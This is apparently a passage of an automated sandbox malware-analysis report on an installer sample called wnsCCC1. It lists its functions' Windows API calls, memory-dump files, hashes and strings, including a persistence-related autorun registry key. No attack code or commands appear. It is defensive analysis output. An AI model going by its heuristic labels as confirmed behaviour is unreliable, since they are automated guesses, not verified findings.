                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                              • String ID: N$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                                                                                                                                                                                                              • API String ID: 3103080414-2660932049
                                                                                                                                                                                                              • Opcode ID: ee6812b55728e13701025233a8a1636c33168640e361f3cefbda46e1e37430c8
                                                                                                                                                                                                              • Instruction ID: 4cd1da19937af119875355adca30567c2743cec9092c6b5b68c8bc3b1ab06c36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee6812b55728e13701025233a8a1636c33168640e361f3cefbda46e1e37430c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 176181B1900209BFDB109F60DD85EAA7B69FB84354F00853AFB05B72E1DB789D51CB98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                              • DrawTextW.USER32(00000000,00468240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                              • String ID: F
                                                                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                                                                              • Opcode ID: d1a6ac0749d5adbba1104fe8f7c5c271f621e3b3c45a8bc66e6bce868fb748d7
                                                                                                                                                                                                              • Instruction ID: 5ab7a9dfb5d1aa1389ec6db6610c78830fc9e5957017c9b4d31100662f95375f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1a6ac0749d5adbba1104fe8f7c5c271f621e3b3c45a8bc66e6bce868fb748d7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14418C71800209AFCF058F95DE459AF7BB9FF44314F00842EF591AA1A0CB78D954DFA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00404850 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00446728,00000000,?,?), ref: 004049B7
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run), ref: 004049C3
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                                                                                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00002000,00404A0C), ref: 00405A45
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004366F8,?,?,0000040F,?,004366F8,004366F8,?,00000001,004366F8,?,?,000003FB,?), ref: 00404A98
                                                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                                                                                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00446728,00446728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00446728), ref: 00404CC9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                              • String ID: (gD$A$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                                                                                                                                                                                                              • API String ID: 2624150263-31143440
                                                                                                                                                                                                              • Opcode ID: ce9fa2f80e2d72a36f4439ca0a9b4256237b791ea529c161ce0682b1aa97351d
                                                                                                                                                                                                              • Instruction ID: 9143468ab5d07659f3e28480ae0608f723924ccc95e3ca23e4c22bb38621839a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce9fa2f80e2d72a36f4439ca0a9b4256237b791ea529c161ce0682b1aa97351d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50A161B1900205ABDB11AFA6CD85AAF77B8EF84315F11803BF601B62D1D77C99418F6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,0045EDC8,00000400), ref: 00406078
                                                                                                                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,0045F5C8,00000400), ref: 00406095
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004060B3
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0045F5C8,C0000000,00000004,0045F5C8,?,?,?,?,?), ref: 004060EE
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,0045E9C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                              • API String ID: 2171350718-461813615
                                                                                                                                                                                                              • Opcode ID: ea336b7c7ee09a778134d66cdc55d59d2776f1992f2862d3dcc69e87973e6afa
                                                                                                                                                                                                              • Instruction ID: a59dba961965db3d83d90a372a5cb94a2ead5b1f2218518f4427fddb9e4ed3d0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea336b7c7ee09a778134d66cdc55d59d2776f1992f2862d3dcc69e87973e6afa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F312771200705BBE2206B628D48F573A6CEF45745F15043EFA46FA2C3DA7CD91586AD
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                              • lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                              • SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2531174081-0
                                                                                                                                                                                                              • Opcode ID: d26779cd53d0e13026bfca991753509873890f78f21e0d47ba27efc3128bd531
                                                                                                                                                                                                              • Instruction ID: b152cc9d973ae9b63f3bddadd0b016ecede68a0b65af60167b2766ac6abf260a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d26779cd53d0e13026bfca991753509873890f78f21e0d47ba27efc3128bd531
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1721A171900518BADB119F96DD84ACFBFB5EF44314F10803AF904B22A1C7798A90CFA8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00402EF5
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                                                                                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,0002E789), ref: 00402E87
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                              • String ID: ... %d%%
                                                                                                                                                                                                              • API String ID: 722711167-2449383134
                                                                                                                                                                                                              • Opcode ID: 0fcb82c9706ea5302a04af69b33a80ab5dbc899856dcad255e9a620228d66a26
                                                                                                                                                                                                              • Instruction ID: 498445d7746695eb5746344947d7fa5b32a20b045a0bc4bf054171d5bd846382
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fcb82c9706ea5302a04af69b33a80ab5dbc899856dcad255e9a620228d66a26
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C901C4B0801614EBC7226B60FE4CA9B7B68BB00745B14013BF885F11E1CBB84855EFDE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                                                                                                                              • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00402E45
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
